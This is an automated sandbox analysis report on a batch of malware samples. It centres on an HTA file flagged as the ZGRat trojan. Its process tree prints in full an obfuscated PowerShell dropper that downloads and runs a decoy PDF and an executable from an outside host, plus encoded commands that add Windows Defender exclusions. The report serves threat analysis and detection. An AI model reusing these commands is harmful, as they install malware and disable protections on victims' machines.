Overview
Tasks (score | sample | platform):
10 | Static | static
3 | magic.pois...lk.dat | windows10-2004-x64
3 | magic.pois...ed.exe | windows10-2004-x64
10 | magic.pois...pt.exe | windows10-2004-x64
10 | magic.pois...cs.hta | windows10-2004-x64
10 | magic.pois...nt.pdf | windows10-2004-x64
1 | magic.pois...zg.wav | windows10-2004-x64
6 | magic.pois...pt.exe | windows10-2004-x64
10 | magic.pois...pt.exe | windows10-2004-x64
10 | magic.pois...es.hta | windows10-2004-x64
10 | magic.pois...im.vdf | windows10-2004-x64
3 | magic.pois...ck.wav | windows10-2004-x64
1 | magic.pois...ff.dat | windows10-2004-x64
3 | magic.pois...IB.pdf | windows10-2004-x64
1 | magic.pois...pt.exe | windows10-2004-x64
10 | magic.pois...ty.wav | windows10-2004-x64
1 | magic.pois...ye.wav | windows10-2004-x64
6 | magic.pois...er.exe | windows10-2004-x64
10 | magic.pois...vw.mp4 | windows10-2004-x64
6 | magic.pois...op.mp4 | windows10-2004-x64
6 | magic.pois...ed.hta | windows10-2004-x64
10 | magic.pois...ng.exe | windows10-2004-x64
10 | magic.pois...wn.png | windows10-2004-x64
3 | magic.pois...ox.hta | windows10-2004-x64
10 | magic.pois...xw.exe | windows10-2004-x64
10 | magic.pois...xw.hta | windows10-2004-x64
Analysis (score 10)
max time kernel: 156s
max time network: 174s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64 arch:x86 image:win10v2004-20231215-en locale:en-us os:windows10-2004-x64 system
submitted: 19-01-2024 20:19
Static task: static1
Behavioral tasks (task | sample | resource):
behavioral1 | magic.poisontoolz.com/Avjteuhlk.dat | win10v2004-20231215-en
behavioral2 | magic.poisontoolz.com/Binded.exe | win10v2004-20231215-en
behavioral3 | magic.poisontoolz.com/Buildcrypt.exe | win10v2004-20231215-en
behavioral4 | magic.poisontoolz.com/Docs.hta | win10v2004-20231215-en
behavioral5 | magic.poisontoolz.com/Document.pdf | win10v2004-20231215-en
behavioral6 | magic.poisontoolz.com/Evllmzg.wav | win10v2004-20231215-en
behavioral7 | magic.poisontoolz.com/File1crypt.exe | win10v2004-20231215-en
behavioral8 | magic.poisontoolz.com/File2crypt.exe | win10v2004-20231215-en
behavioral9 | magic.poisontoolz.com/Files.hta | win10v2004-20231215-en
behavioral10 | magic.poisontoolz.com/Jafxaspdhim.vdf | win10v2004-20231215-en
behavioral11 | magic.poisontoolz.com/Otcck.wav | win10v2004-20231222-en
behavioral12 | magic.poisontoolz.com/Pphucxdmff.dat | win10v2004-20231222-en
behavioral13 | magic.poisontoolz.com/RIB.pdf | win10v2004-20231215-en
behavioral14 | magic.poisontoolz.com/RagCrypt.exe | win10v2004-20231222-en
behavioral15 | magic.poisontoolz.com/Spaufgty.wav | win10v2004-20231222-en
behavioral16 | magic.poisontoolz.com/Utsxokye.wav | win10v2004-20231215-en
behavioral17 | magic.poisontoolz.com/Walter.exe | win10v2004-20231215-en
behavioral18 | magic.poisontoolz.com/Wjwxkhbvw.mp4 | win10v2004-20231215-en
behavioral19 | magic.poisontoolz.com/Wlkubkwdmop.mp4 | win10v2004-20231215-en
behavioral20 | magic.poisontoolz.com/binded.hta | win10v2004-20231215-en
behavioral21 | magic.poisontoolz.com/building.exe | win10v2004-20231215-en
behavioral22 | magic.poisontoolz.com/down.png | win10v2004-20231215-en
behavioral23 | magic.poisontoolz.com/fox.hta | win10v2004-20231215-en
behavioral24 | magic.poisontoolz.com/xw.exe | win10v2004-20231215-en
behavioral25 | magic.poisontoolz.com/xw.hta | win10v2004-20231215-en
General
Target: magic.poisontoolz.com/fox.hta
Size: 13KB
MD5: 2d4c16415e96b123166fb5791f589a74
SHA1: c7d04a986c3382cddb58b17f06dd372c66100e6c
SHA256: 87c90c1f78c42da7be295cbd0ae9523d975753f65e0e8e7ef5f63ee38da43454
SHA512: 7091e2fa62697a038e7ab8a80298df6922d54e8cd1a9f51d22c33e02d3fafbdaad312645eede17c6d7c5177bec4cae97a3c40aeb7b619d8dcc4b59f09d312012
SSDEEP: 384:9FQ1lDQfQnqQ1yySMyEFo08QkuVTHTAWX4HRXz6:/Q1lDQfQnqQ1yySMyEFo08QkuVTHTAWB
Malware Config
Signatures
Detect ZGRat V1 (34 IoCs)
resource | yara_rule
behavioral23/memory/4080-46-0x0000000006360000-0x000000000648A000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-47-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-52-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-54-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-50-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-58-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-66-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-72-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-78-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-90-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-96-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-100-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-102-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-104-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-108-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-110-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-106-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-98-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-94-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-92-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-88-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-86-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-84-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-80-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-76-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-74-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-70-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-68-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-64-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-62-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-60-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-56-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/4080-48-0x0000000006360000-0x0000000006483000-memory.dmp | family_zgrat_v1
behavioral23/memory/3416-9799-0x00000000054E0000-0x0000000005616000-memory.dmp | family_zgrat_v1
Blocklisted process makes network request (1 IoC)
flow | pid | process
20 | 1868 | powershell.exe

Downloads MZ/PE file
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation | mshta.exe
Executes dropped EXE (7 IoCs)
pid | process
4080 | yagacrypt.exe
556 | yagacrypt.exe
3152 | LegalBlockSizes.exe
3648 | LegalBlockSizes.exe
1592 | LegalBlockSizes.exe
3416 | ggiac.exe
3460 | ggiac.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
82 | ip-api.com
Suspicious use of SetThreadContext (5 IoCs)
description | pid | process | target process
PID 4080 set thread context of 556 | 4080 | yagacrypt.exe | yagacrypt.exe
PID 3152 set thread context of 1592 | 3152 | LegalBlockSizes.exe | LegalBlockSizes.exe
PID 1592 set thread context of 1092 | 1592 | LegalBlockSizes.exe | InstallUtil.exe
PID 1092 set thread context of 1708 | 1092 | InstallUtil.exe | InstallUtil.exe
PID 3416 set thread context of 3460 | 3416 | ggiac.exe | ggiac.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | AcroRd32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | AcroRd32.exe
Modifies Internet Explorer settings
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | AcroRd32.exe
Modifies registry class (1 IoC)
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000_Classes\Local Settings | powershell.exe
Suspicious behavior: EnumeratesProcesses (31 IoCs)
pid | process
1868 | powershell.exe (2 times)
2996 | AcroRd32.exe (20 times)
392 | powershell.exe (3 times)
3152 | LegalBlockSizes.exe (2 times)
1592 | LegalBlockSizes.exe (2 times)
2784 | powershell.exe (2 times)
Suspicious use of AdjustPrivilegeToken (11 IoCs)
description | pid | process
Token: SeDebugPrivilege | 1868 | powershell.exe
Token: SeDebugPrivilege | 4080 | yagacrypt.exe
Token: SeDebugPrivilege | 556 | yagacrypt.exe
Token: SeDebugPrivilege | 392 | powershell.exe
Token: SeDebugPrivilege | 3152 | LegalBlockSizes.exe
Token: SeDebugPrivilege | 1592 | LegalBlockSizes.exe
Token: SeDebugPrivilege | 1092 | InstallUtil.exe
Token: SeDebugPrivilege | 2784 | powershell.exe
Token: SeDebugPrivilege | 1708 | InstallUtil.exe
Token: SeDebugPrivilege | 3416 | ggiac.exe
Token: SeDebugPrivilege | 3460 | ggiac.exe
Suspicious use of FindShellTrayWindow (1 IoC)
pid | process
2996 | AcroRd32.exe
Suspicious use of SetWindowsHookEx (5 IoCs)
pid | process
2996 | AcroRd32.exe (5 times)
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | process | target process
PID 1748 wrote to memory of 1868 | 1748 | mshta.exe | powershell.exe (3 times)
PID 1868 wrote to memory of 2996 | 1868 | powershell.exe | AcroRd32.exe (3 times)
PID 1868 wrote to memory of 4080 | 1868 | powershell.exe | yagacrypt.exe (3 times)
PID 2996 wrote to memory of 2116 | 2996 | AcroRd32.exe | RdrCEF.exe (3 times)
PID 2116 wrote to memory of 692 | 2116 | RdrCEF.exe | RdrCEF.exe (41 times)
PID 2116 wrote to memory of 3208 | 2116 | RdrCEF.exe | RdrCEF.exe (11 times)
Processes
[level 1] C:\Windows\SysWOW64\mshta.exe
Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\fox.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID: 1748
[level 2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hPhLUO($gYYfVUqro, $TDHCoMacW){[IO.File]::WriteAllBytes($gYYfVUqro, $TDHCoMacW)};function OuyjBhDPrdGwPbLI($gYYfVUqro){if($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38832,38840,38840))) -eq $True){rundll32.exe $gYYfVUqro }elseif($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38844,38847,38781))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $gYYfVUqro}elseif($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38841,38847,38837))) -eq $True){misexec /qn /i $gYYfVUqro}else{Start-Process $gYYfVUqro}};function wZPwXqcGcNksDcvtMGB($uyaYBkDZCCSyzJDelsei){$iFRLJMGtgESMZFs = New-Object (bGYiXoWxyxIAMYfHnL @(38810,38833,38848,38778,38819,38833,38830,38799,38840,38837,38833,38842,38848));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$TDHCoMacW = $iFRLJMGtgESMZFs.DownloadData($uyaYBkDZCCSyzJDelsei);return $TDHCoMacW};function bGYiXoWxyxIAMYfHnL($NWBOMT){$RZDKPliAxJ=38732;$BhXTohPOo=$Null;foreach($eKsxkGZtQqIkdSPR in $NWBOMT){$BhXTohPOo+=[char]($eKsxkGZtQqIkdSPR-$RZDKPliAxJ)};return $BhXTohPOo};function gNBuaXtjuReBmDfHma(){$hIYbSEpsSJoZXPH = $env:AppData + '\';$YQPfBhOhZMdWRyHeqKPdf = $hIYbSEpsSJoZXPH + 'RIB.pdf';If(Test-Path -Path $YQPfBhOhZMdWRyHeqKPdf){Invoke-Item $YQPfBhOhZMdWRyHeqKPdf;}Else{ $arPZzcSlEyncTeAIE = wZPwXqcGcNksDcvtMGB (bGYiXoWxyxIAMYfHnL @(38836,38848,38848,38844,38847,38790,38779,38779,38841,38829,38835,38837,38831,38778,38844,38843,38837,38847,38843,38842,38848,38843,38843,38840,38854,38778,38831,38843,38841,38779,38814,38805,38798,38778,38844,38832,38834));hPhLUO $YQPfBhOhZMdWRyHeqKPdf $arPZzcSlEyncTeAIE;Invoke-Item $YQPfBhOhZMdWRyHeqKPdf;};$RYunDk = $hIYbSEpsSJoZXPH + 'yagacrypt.exe'; if (Test-Path -Path $RYunDk){OuyjBhDPrdGwPbLI $RYunDk;}Else{ $ehQGZXVzn = wZPwXqcGcNksDcvtMGB (bGYiXoWxyxIAMYfHnL @(38836,38848,38848,38844,38847,38790,38779,38779,38841,38829,38835,38837,38831,38778,38844,38843,38837,38847,38843,38842,38848,38843,38843,38840,38854,38778,38831,38843,38841,38779,38853,38829,38835,38829,38831,38846,38853,38844,38848,38778,38833,38852,38833));hPhLUO $RYunDk $ehQGZXVzn;OuyjBhDPrdGwPbLI $RYunDk;};;;;}gNBuaXtjuReBmDfHma;
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 1868
[level 3] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\RIB.pdf"
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID: 2996
[level 4] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
- Suspicious use of WriteProcessMemory
PID: 2116
[level 5] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0C7AA00897205B0621305857D4844299 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
PID: 692
[level 5] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4E8D65E53F52C2E793C436F7B299ADBD --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4E8D65E53F52C2E793C436F7B299ADBD --renderer-client-id=2 --mojo-platform-channel-handle=1792 --allow-no-sandbox-job /prefetch:1
PID: 3208
[level 5] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=3FDE9A082A75A0F1B85D6E2E64451CD6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=3FDE9A082A75A0F1B85D6E2E64451CD6 --renderer-client-id=4 --mojo-platform-channel-handle=2284 --allow-no-sandbox-job /prefetch:1
PID: 3448
[level 5] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=52B0186A564DE3CD6194553D4ACAB064 --mojo-platform-channel-handle=2548 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
PID: 2128
[level 5] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=73AC7C45C0CF6A5E20EAE9DA9193AB63 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
PID: 2060
[level 5] C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Command line: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3261FE8E9A19406519F4ABADEEF0918A --mojo-platform-channel-handle=2596 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
PID: 4584
[level 3] C:\Users\Admin\AppData\Roaming\yagacrypt.exe
Command line: "C:\Users\Admin\AppData\Roaming\yagacrypt.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID: 4080
[level 4] C:\Users\Admin\AppData\Roaming\yagacrypt.exe
Command line: C:\Users\Admin\AppData\Roaming\yagacrypt.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID: 556
[level 1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 392
[level 1] C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
Command line: C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3152
[level 2] C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
Command line: C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
- Executes dropped EXE
PID: 3648
[level 2] C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
Command line: C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 1592
[level 3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID: 1092
[level 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
- Suspicious use of AdjustPrivilegeToken
PID: 1708
[level 1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2784
[level 1] C:\Users\Admin\AppData\Local\Temp\ggiac.exe
Command line: C:\Users\Admin\AppData\Local\Temp\ggiac.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID: 3416
[level 2] C:\Users\Admin\AppData\Local\Temp\ggiac.exe
Command line: C:\Users\Admin\AppData\Local\Temp\ggiac.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID: 3460
Network
